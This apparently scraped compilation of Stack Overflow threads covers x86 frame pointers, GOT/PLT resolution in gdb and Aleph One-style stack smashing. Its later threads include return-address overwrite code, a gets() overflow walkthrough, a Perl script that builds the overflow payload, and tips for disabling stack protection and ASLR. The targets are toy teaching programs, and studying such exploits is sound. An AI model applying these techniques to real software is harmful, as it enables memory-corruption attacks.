I'm trying to get the FP in my C program, I tried two different ways, but they both differ from what I get when I run GDB.
The first way I tried, I made a protocol function in C for the Assembly function:
int* getEbp();
and my code looks like this:
int* ebp = getEbp();
printf("ebp: %08x\n", ebp); // value i get here is 0xbfe2db58
while( esp <= ebp )
esp -= 4;
printf( "ebp: %08x, esp" ); //value i get here is 0xbfe2daec
My assembly code
getEbp:
movl %ebp, %eax
ret
I tried making the prototype function to just return an int, but that also doesn't match up with my GDB output. We are using x86 assembly.
EDIT: typos, and my getEsp function looks exactly like the other one:
getEsp:
movl %esp, %eax
ret
For reading a register, it's indeed best to use GCC extended inline assembly syntax.
Your getEbp() looks like it should work if you compiled it in a separate assembler file.
Your getEsp() is obviously incorrect since it doesn't take the return address pushed by the caller into account.
Here's a code snippet that gets ebp through extended inline asm and does stack unwinding by chasing the frame pointer:
struct stack_frame {
struct stack_frame *prev;
void *return_addr;
} __attribute__((packed));
typedef struct stack_frame stack_frame;
void backtrace_from_fp(void **buf, int size)
{
int i;
stack_frame *fp;
__asm__("movl %%ebp, %[fp]" : /* output */ [fp] "=r" (fp));
for(i = 0; i < size && fp != NULL; fp = fp->prev, i++)
buf[i] = fp->return_addr;
}
I'll show two working implementations of reading the registers below. The pure asm functions are get_ebp() and get_esp() in getbp.S. The other set implemented as inline functions are get_esp_inline() and get_ebp_inline() at the top of test-getbp.c.
In getbp.S
.section .text
/* obviously incurring the cost of a function call
to read a register is inefficient */
.global get_ebp
get_ebp:
movl %ebp, %eax
ret
.global get_esp
get_esp:
/* 4: return address pushed by caller */
lea 4(%esp), %eax
ret
In test-getbp.c
#include <stdio.h>
#include <stdint.h>
/* see http://sourceware.org/systemtap/wiki/UserSpaceProbeImplementation */
#include <sys/sdt.h>
int32_t *get_ebp(void);
int32_t *get_esp(void);
__attribute__((always_inline)) uintptr_t *get_ebp_inline(void)
{
uintptr_t *r;
__asm__ volatile ("movl %%ebp, %[r]" : /* output */ [r] "=r" (r));
return r;
}
__attribute__((always_inline)) uintptr_t *get_esp_inline(void)
{
uintptr_t *r;
__asm__ volatile ("movl %%esp, %[r]" : /* output */ [r] "=r" (r));
return r;
}
int main(int argc, char **argv)
{
uintptr_t *bp, *sp;
/* allocate some random data on the stack just for fun */
int a[10] = { 1, 3, 4, 9 };
fprintf(fopen("/dev/null", "r"), "%d\n", a[3]);
STAP_PROBE(getbp, getbp); /* a static probe is like a named breakpoint */
bp = get_ebp();
sp = get_esp();
printf("asm: %p, %p\n", (void*)bp, (void*)sp);
bp = get_ebp_inline();
sp = get_esp_inline();
printf("inline: %p, %p\n", (void*)bp, (void*)sp);
return 0;
}
We can now write a GDB script to dump ebp and esp while making use of the getbp static probe defined in test-getbp.c above.
In test-getbp.gdb
file test-getbp
set breakpoint pending on
break -p getbp
commands
silent
printf "gdb: 0x%04x, 0x%04x\n", $ebp, $esp
continue
end
run
quit
To verify that the functions return the same data as GDB:
$ gdb -x test-getbp.gdb
< ... >
gdb: 0xffffc938, 0xffffc920
asm: 0xffffc938, 0xffffc920
inline: 0xffffc938, 0xffffc920
< ... >
Disassembling test-getbp main() produces:
0x08048370 <+0>: push %ebp
0x08048371 <+1>: mov %esp,%ebp
0x08048373 <+3>: push %ebx
0x08048374 <+4>: and $0xfffffff0,%esp
0x08048377 <+7>: sub $0x10,%esp
0x0804837a <+10>: movl $0x8048584,0x4(%esp)
0x08048382 <+18>: movl $0x8048586,(%esp)
0x08048389 <+25>: call 0x8048360 <fopen#plt>
0x0804838e <+30>: movl $0x9,0x8(%esp)
0x08048396 <+38>: movl $0x8048590,0x4(%esp)
0x0804839e <+46>: mov %eax,(%esp)
0x080483a1 <+49>: call 0x8048350 <fprintf#plt>
0x080483a6 <+54>: nop
0x080483a7 <+55>: call 0x80484e4 <get_ebp>
0x080483ac <+60>: mov %eax,%ebx
0x080483ae <+62>: call 0x80484e7 <get_esp>
0x080483b3 <+67>: mov %ebx,0x4(%esp)
0x080483b7 <+71>: movl $0x8048594,(%esp)
0x080483be <+78>: mov %eax,0x8(%esp)
0x080483c2 <+82>: call 0x8048320 <printf#plt>
0x080483c7 <+87>: mov %ebp,%eax
0x080483c9 <+89>: mov %esp,%edx
0x080483cb <+91>: mov %edx,0x8(%esp)
0x080483cf <+95>: mov %eax,0x4(%esp)
0x080483d3 <+99>: movl $0x80485a1,(%esp)
0x080483da <+106>: call 0x8048320 <printf#plt>
0x080483df <+111>: xor %eax,%eax
0x080483e1 <+113>: mov -0x4(%ebp),%ebx
0x080483e4 <+116>: leave
0x080483e5 <+117>: ret
The nop at <main+54> is the static probe. See the code around the two printf calls for how the registers are read.
BTW, this loop in your code seems strange to me:
while( esp <= ebp )
esp -= 4;
Don't you mean
while (esp < ebp)
esp +=4
?
Because you're relying on implementation specific details, you need to provide more information about your target to get an accurate answer. You didn't specify architecture, compiler or operating system, which are really required to answer your question.
Making an educated guess based on the register names you referenced and the fact that you're using at&t syntax, I'm going to assume this is i386 and you're using gcc.
The simplest way to achieve this is using gcc variable attributes, you can try this, which is a gcc specific syntax to request a specific register.
#include <stdint.h>
#include <stdio.h>
int main(int argc, char **argv)
{
const uintptr_t register framep asm("ebp");
fprintf(stderr, "val: %#x\n", framep);
return 0;
}
An alternative is to use inline assembly to load the value, like this:
#include <stdint.h>
#include <stdio.h>
int main(int argc, char **argv)
{
uintptr_t framep;
asm("movl %%ebp, %0" : "=r" (framep));
fprintf(stderr, "val: %#x\n", framep);
return 0;
}
This requests a 32bit register for a write-operation (= modifier), and loads it onto framep. The compiler takes care of extracting the values you declare.
In gdb, you can print the value and verify it matches the output.
(gdb) b main
Breakpoint 1 at 0x40117f: file ebp2.c, line 8.
(gdb) r
Starting program: /home/zero/a.exe
[New Thread 4664.0x1290]
[New Thread 4664.0x13c4]
Breakpoint 1, main (argc=1, argv=0x28ac50) at ebp2.c:8
8 asm("movl %%ebp, %0" : "=r" (framep));
(gdb) n
10 fprintf(stderr, "val: %#x\n", framep);
(gdb) p/x framep
$1 = 0x28ac28
(gdb) p/x $ebp
$2 = 0x28ac28
(gdb) c
Continuing.
val: 0x28ac28
[Inferior 1 (process 4664) exited normally]
(gdb) q
Remember that you cannot rely on this behaviour, even on x86 gcc can be configured to not use the frame pointer and keeps track of stack usage manually. This is generally called FPO by Microsoft, or omit-frame-pointer on other platforms. This trick frees up another register for general purpose use, but makes debugging a little more complicated.
You're correct that eax is generally used for return values where possible in x86 calling conventions, I have no idea why the comments on your post claim the stack is used.
Related
This question already has answers here:
C Code how to change return address in the code?
(3 answers)
Closed 7 years ago.
I'm trying to find a way to exploit the buffer overflow vulnerability in the following source code so the line, printf("x is 1") will be skipped:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void func(char *str) {
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc, char **argv) {
int x;
x = 0;
func(argv[1]);
x = 1;
printf("x is 1");
printf("x is 0");
getchar();
}
In order to do this, I want to modify the "func" function. I know that I will need to use the ret variable in order to modify the return address to just past the line I want to skip, but I'm not sure how to actually do that. Does anyone have a suggestion?
EDIT:
By using gdb, I was able to find the following calls in the main function:
Temporary breakpoint 1, 0x00000000004005ec in main ()
(gdb) x/20i $pc
=> 0x4005ec <main+4>: sub $0x20,%rsp
0x4005f0 <main+8>: mov %edi,-0x14(%rbp)
0x4005f3 <main+11>: mov %rsi,-0x20(%rbp)
0x4005f7 <main+15>: movl $0x0,-0x4(%rbp)
0x4005fe <main+22>: mov -0x20(%rbp),%rax
0x400602 <main+26>: add $0x8,%rax
0x400606 <main+30>: mov (%rax),%rax
0x400609 <main+33>: mov %rax,%rdi
0x40060c <main+36>: callq 0x4005ac <func>
0x400611 <main+41>: movl $0x1,-0x4(%rbp)
0x400618 <main+48>: mov $0x4006ec,%edi
0x40061d <main+53>: mov $0x0,%eax
0x400622 <main+58>: callq 0x400470 <printf#plt>
0x400627 <main+63>: mov $0x4006f3,%edi
0x40062c <main+68>: mov $0x0,%eax
0x400631 <main+73>: callq 0x400470 <printf#plt>
0x400636 <main+78>: callq 0x400490 <getchar#plt>
0x40063b <main+83>: leaveq
0x40063c <main+84>: retq
0x40063d: nop
Although, I'm confused as of where to go from here. I know that the function will return to the line of 0x400611 and that I need to cause it to jump to 0x400631, but I'm not sure how to determine how many bits to jump or how I should be modifying the ret variable.
The idea is to find where the return address to the main function is on the stack and then add to this address the offset to the command you'd like to get.
To do that:
Use the disassembly to find the difference between the original return address and the new one:
Find the func frame address on the stack using a local variable (e.g. the function parameter):
Finally find the relative location of the return address on the stack comparing the address of the local variable:
Using the above your code would look something like:
void func(char *str) {
// 1. Get the address of an object on the stack
long *ret = (long*)(&str);
// 2. Move ret to point to the location of the return address from this function.
// Per the example above on my system (Windows 64bit + VS) it was just -1
ret -= NUMBER_OF_ITEMS_IN_THE_STACK_BEFORE_RETURN_ADDR;
// 3. Modify the return address by adding it the offset to command to go to (in my
// (case 33).
*ret = *ret + OFFSET_TO_COMMAND;
// The rest of your code
char buffer[24];
strcpy(buffer, str);
}
As noted above, the exact numbers are system dependent (i.e. OS, Compiler, etc.). However, using the techniques above you should be able to find the right numbers to set.
As a final note, modern compilers (e.g. VS) may have security guards for protecting stack corruption. If your program crashed because of it check in your compiler options how this option can be disabled.
I'm doing some experiment about shared library in Linux. By reading several papers I think I know what happens when a shared library function is called.
But when I am trying to trace the memory to get the binary code in a shared library function, I find something strange. In my opinion, after calling a shared library function, the corresponding slot in .got.plt should contain the actual function address, but my experiment shows that it still remains the same, i.e the address of the second instruction in func#plt section. I'm rather confused about this, so if anyone could help me?
Here is my code and output:
#include <stdio.h>
#include <string.h>
typedef unsigned long u_l;
int main()
{
char *p_ch = strstr("abc", "b");
printf("result = %s\n", p_ch);
long long *p = (long long *) &strstr;
printf("data = %llx\n", *(p));
long long k = *p >> 16;
u_l *entry_addr = (u_l *)(k & 0x00000000ffffffff);
printf("entry_addr = %lx\n", entry_addr);
u_l *func_addr = (u_l *)*entry_addr;
printf("func_addr = %lx\n", func_addr);
printf("code = %llx\n", *func_addr);
return 0;
}
output:
result = bc
data = 680804a00c25ff
entry_addr = 804a00c
func_addr = 8048326
code = 68080400000068
Thanks first!
PS: Please don't ask me why I need to get the code of a shared library function. Of course I know the source code and the binary could be obtained easily. It's just a experiment.
My GCC version is 4.7.3. Kernel version is 3.8.0-35
Not sure what is the logic of Your program, but I'll try to show where address changes.
$ gcc -Wall -g test.c
$ gdb a.out
(gdb) break main
Breakpoint 1 at 0x40054c: file test.c, line 8.
(gdb) run
(gdb) disassemble
Dump of assembler code for function main:
0x0000000000400544 <+0>: push %rbp
0x0000000000400545 <+1>: mov %rsp,%rbp
0x0000000000400548 <+4>: sub $0x30,%rsp
=> 0x000000000040054c <+8>: movq $0x4006fd,-0x28(%rbp)
0x0000000000400554 <+16>: mov $0x400700,%eax
0x0000000000400559 <+21>: mov -0x28(%rbp),%rdx
0x000000000040055d <+25>: mov %rdx,%rsi
0x0000000000400560 <+28>: mov %rax,%rdi
0x0000000000400563 <+31>: mov $0x0,%eax
0x0000000000400568 <+36>: callq 0x400430 <printf#plt>
0x000000000040056d <+41>: movq $0x400450,-0x20(%rbp)
0x0000000000400575 <+49>: mov -0x20(%rbp),%rax
0x0000000000400579 <+53>: mov (%rax),%rdx
0x000000000040057c <+56>: mov $0x40070d,%eax
0x0000000000400581 <+61>: mov %rdx,%rsi
0x0000000000400584 <+64>: mov %rax,%rdi
0x0000000000400587 <+67>: mov $0x0,%eax
0x000000000040058c <+72>: callq 0x400430 <printf#plt>
0x0000000000400591 <+77>: mov -0x20(%rbp),%rax
0x0000000000400595 <+81>: mov (%rax),%rax
0x0000000000400598 <+84>: sar $0x10,%rax
0x000000000040059c <+88>: mov %rax,-0x18(%rbp)
Let's make breakpoint in PLT table at printf entry (0x400430) and continue:
(gdb) break *0x400430
Breakpoint 2 at 0x400430
(gdb) continue
Continuing.
Breakpoint 2, 0x0000000000400430 in printf#plt ()
(gdb) disassemble
Dump of assembler code for function printf#plt:
=> 0x0000000000400430 <+0>: jmpq *0x200bca(%rip) # 0x601000 <printf#got.plt>
0x0000000000400436 <+6>: pushq $0x0
0x000000000040043b <+11>: jmpq 0x400420
End of assembler dump.
(gdb) x/x 0x601000
0x601000 <printf#got.plt>: 0x00400436
In PLT table You can see indirect jump by address stored in GOT at 0x601000 (0x200bca+0x400430+6), which at first function invocation resolves to next address in PLT (0x00400436: pushq and jump to dynamic linker). Dynamic linker finds real printf, updates it's GOT entry and jumps to it.
Next time You call the same printf function (and hit the breakpoint), it's entry at GOT 0x601000 is already updated to 0xf7a6d840, so there is jump directly to printf, not to dynamic linker.
(gdb) c
Continuing.
result = bc
Breakpoint 2, 0x0000000000400430 in printf#plt ()
(gdb) disassemble
Dump of assembler code for function printf#plt:
=> 0x0000000000400430 <+0>: jmpq *0x200bca(%rip) # 0x601000 <printf#got.plt>
0x0000000000400436 <+6>: pushq $0x0
0x000000000040043b <+11>: jmpq 0x400420
End of assembler dump.
(gdb) x/x 0x601000
0x601000 <printf#got.plt>: 0xf7a6d840
This example is from 64bit Linux. On other *NIX'es assembly or similar details may vary, but idea remains the same.
One thing else, I couldn't find printf in my libc.so, …
This program shows you an address and the containing library (using a Glibc extension) for each function given as an argument:
/* cc -ldl */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
int main(int argc, char *argv[])
{
while (*++argv)
{
void *handle = dlopen(NULL, RTLD_NOW);
if (!handle) puts(dlerror()), exit(1);
void *p = dlsym(handle, *argv);
char *s = dlerror();
if (s) puts(s), exit(1);
printf("%s = %p\n", *argv, p);
Dl_info info;
if (dladdr(p, &info))
printf("%s contains %s\n", info.dli_fname, info.dli_sname);
}
}
i am currently working on gdb disassembly to help me understand more detail about the c program so i write a c program:
#include <stdio.h>
void swap(int a, int b){
int temp = a;
a = b;
b = temp;
}
void main(){
int a = 1,b = 2;
swap(a, b);
}
I use gdb and run disass /m main to get those:
(gdb) disass /m main
Dump of assembler code for function main:
8 void main(){
0x0000000000400492 <+0>: push %rbp
0x0000000000400493 <+1>: mov %rsp,%rbp
0x0000000000400496 <+4>: sub $0x10,%rsp
9 int a = 1,b = 2;
0x000000000040049a <+8>: movl $0x1,-0x8(%rbp)
0x00000000004004a1 <+15>: movl $0x2,-0x4(%rbp)
10 swap(a, b);
0x00000000004004a8 <+22>: mov -0x4(%rbp),%edx
0x00000000004004ab <+25>: mov -0x8(%rbp),%eax
0x00000000004004ae <+28>: mov %edx,%esi
0x00000000004004b0 <+30>: mov %eax,%edi
0x00000000004004b2 <+32>: callq 0x400474 <swap>
11 }
0x00000000004004b7 <+37>: leaveq
0x00000000004004b8 <+38>: retq
End of assembler dump.
My question is those -0x8(%rbp) means what?
A memory or a register?
I do know that 1 is store in -0x8(%rbp) and 2 is in -0x4(%rbp), How can i show the value in
thoes kind of 'place' ?
I try to use (gdb) p -0x8(%rbp) but get this:
A syntax error in expression, near `%rbp)'.
Registers in gdb can be referred with the prefix '$'
p *(int *)($rbp - 8)
RBP and RSP most likely refer to memory locations, specifically to stack. Other registers are more or less generic purpose registers and can point to memory too.
It means "the data stored when you subtract eight from the address stored in rbp". Try looking at the stack commands available in gdb: http://www.delorie.com/gnu/docs/gdb/gdb_41.html
The actually meaning of those structures such as -0x8(%rbp) depends on the architecture (or the assembly language). But in this case, -0x8(%rbp) is a memory address, probably value of %rbp minus 8.
In gdb, you can print the value of those memory address by doing something like
info r rbp
p *(int *)(value_of_rbp - 8)
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf#plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.